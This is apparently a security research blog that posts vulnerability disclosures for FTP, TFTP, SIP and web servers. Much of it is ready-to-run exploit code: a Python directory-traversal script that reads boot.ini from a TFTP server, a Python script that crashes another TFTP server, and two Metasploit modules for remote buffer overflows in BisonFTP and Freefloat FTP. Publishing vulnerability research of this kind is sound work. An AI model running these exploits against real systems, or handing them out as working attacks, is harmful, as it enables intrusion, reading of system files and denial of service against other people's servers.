SecPod Research Blog

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in OfficeSIP Server. The vulnerability is caused due to improper validation of SIP/SIPS URI in the ‘To’ header of the request. The flaw can be exploited to crash the service.

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

SecPod Research Team member (Prabhu S Angadi) has found Denial of Service Vulnerability in NetSarang Xlpd Printer Daemon. The vulnerability is caused due to improper validation of malicious LPD request sent to printer daemon. The flaw can be exploited to crash the service.

POC : Download here.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

SecPod Research Team member (Prabhu S Angadi) has found Multiple Persistence Cross-Site Scripting Vulnerabilities in Sphinix Mobile Web Server Blog. The vulnerability is caused by improper validation of “comment” parameter in “/Blog/MyFirstBlog.txt” and “/Blog/AboutSomething.txt” pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

SecPod Research Team member (Antu Sanadi) has found Multiple Persistence Cross-Site Scripting Vulnerabilities in Apache Struts. The vulnerability is caused by improper validation of various parameters in multiple pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

SecPod Research Team member (Prabhu S Angadi) has found a Directory Traversal vulnerability in Ipswitch TFTP Server. The vulnerability is caused due to improper validation of ‘Read’ request containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.whatsupgold.com/index.aspx
# Advisory  : http://secpod.org/blog/?p=424
#             http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
#             http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''

    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()

    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print '\tUsage: python exploit.py target_ip'
        print '\tExample : python exploit.py 127.0.0.1'
        print '\tExiting...'
        sys.exit(0)

    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port

    data = "\x00\x01"                                ## TFTP Read Request
    data += "../" * 10 + "boot.ini" + "\x00"         ## Read boot.ini file using directory traversal
    data += "netascii\x00"                           ## TFTP Type

    ## netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

SecPod Research Team member (Prabhu S Angadi) has found Multiple Cross Site Scripting Vulnerabilities in GoAhead WebServer. The vulnerability is caused by improper validation of input to ‘name’ & ‘address’ parameters in /goform/formTest page. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in Hillstone Software HS TFTP Server. The vulnerability is caused due to improper validation of WRITE/READ Request Parameter containing long file name. The flaw can be exploited to crash the service.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Hillstone Software HS TFTP Server Denial Of Service Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.hillstone-software.com/hs_tftp_details.htm
# Advisory  : http://secpod.org/blog/?p=419
#             http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
#             http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
# Version   : Hillstone Software HS TFTP 1.3.2
# Date      : 02/12/2011
##############################################################################

import socket,sys,time

port   = 69
target = raw_input("Enter host/target ip address: ")

if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)

print "you entered ", target

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

## File name >= 222 length leads to crash
exploit = "\x90" * 2222

mode = "binary"
print "File name WRITE/READ crash"

## WRITE command = \x00\x02
data = "\x00\x02" + exploit + "\0" + mode + "\0"

## READ command = \x00\x01
## data = "\x00\x01" + exploit + "\0" + mode + "\0"

sock.sendto(data, (target, port))
time.sleep(2)
sock.close()
try:
    sock.connect()
except:
    print "Remote TFTP server port is down..."
    sys.exit(1)

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for BisonFTP Server Remote Buffer Overflow Vulnerability.

Metasploit : Download here.

##
# $Id: bison_server_bof.rb 2011-08-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BisonFTP Server Remote Buffer Overflow Vulnerability',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in the BisonFTP Server <= v3.5 .
			},
			'Author'         =>
				[
					'localh0t',		# Initial PoC
					'veerendragg @ SecPod',	# Metasploit Module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.0 $',
			'References'     =>
				[
					[ 'BID', '49109'],
					[ 'CVE', '1999-1510'],
					[ 'URL', 'http://secpod.org/blog/?p=384'],
					[ 'URL', 'http://www.exploit-db.com/exploits/17649'],
					[ 'URL', 'http://secpod.org/msf/bison_server_bof.rb'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 388,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
						{
							'Ret' => 0x0040333f, # call edx from Bisonftp.exe
							'Offset' => 1432
						}
					],
				],
			'DisclosureDate' => 'Aug 07 2011',
			'DefaultTarget'	=> 0))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")
		print_status("Connected to #{datastore['RHOST']}:#{datastore['RPORT']}")
		sploit = rand_text_alpha(1028)					## Random Buffer
		sploit << "\x90" * 16						## Padding
		sploit << payload.encoded					## Encoded Payload
		sploit << "\x90" * (388 - payload.encoded.length)		## More Nops
		sploit << [target.ret].pack('V')				## Return Address
		sploit << rand_text_alpha(39)					## More Buffer

		print_status("Sending payload...")
		sock.put(sploit)

		handler
		disconnect
	end

end

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

SecPod Research Team member (Veerendra G.G) wrote Metasploit module for Freefloat FTP Server APPE Command Overflow Vulnerability.

Metasploit : Download here.

##
# $Id: freefloat_ftp_apee_cmd.rb 2011-07-19 03:13:45Z veerendragg $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Freefloat FTP Server APPE Command Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability
					found in the APPE command in the Freefloat FTP server.
			},
			'Author'         =>
				[
					'veerendragg @ SecPod',	# Initial Discovery
					'veerendragg @ SecPod'	# Metasploit Module
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 1.0 $',
			'References'     =>
				[
					[ 'URL', 'http://secpod.org/blog/?p=310' ],
					[ 'URL', 'http://secpod.org/blog/?p=353' ],
					[ 'URL', 'http://secpod.org/msf/freefloat_ftp_apee_cmd.rb'],
					[ 'URL', 'http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space' => 500,
					'BadChars' => "\x00\x0a\x0d",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
						{
							'Ret' => 0x7e429353, # jmp esp from user32.dll
							'Offset' => 246
						}
					],
				],
			'DisclosureDate' => 'Aug 07 2011',
			'DefaultTarget'	=> 0))
	end

	def exploit
		connect_login
		print_status("Trying target #{target.name}...")
		buf = make_nops(target['Offset'])
		buf << [target.ret].pack('V')
		buf << make_nops(30)
		buf << payload.encoded

		print_status("Sending exploit buffer...")
		send_cmd( ['APPE', buf] , false )

		handler
		disconnect
	end

end

Welcome any feedback or suggestion.
Cheers!
SecPod Research Team

SecPod Research Team member (Antu Sanadi) has found Multiple Vulnerabilities in Xataface WebAuction and Xataface Librarian DB. The vulnerability is caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

More information on the flaws can be found here.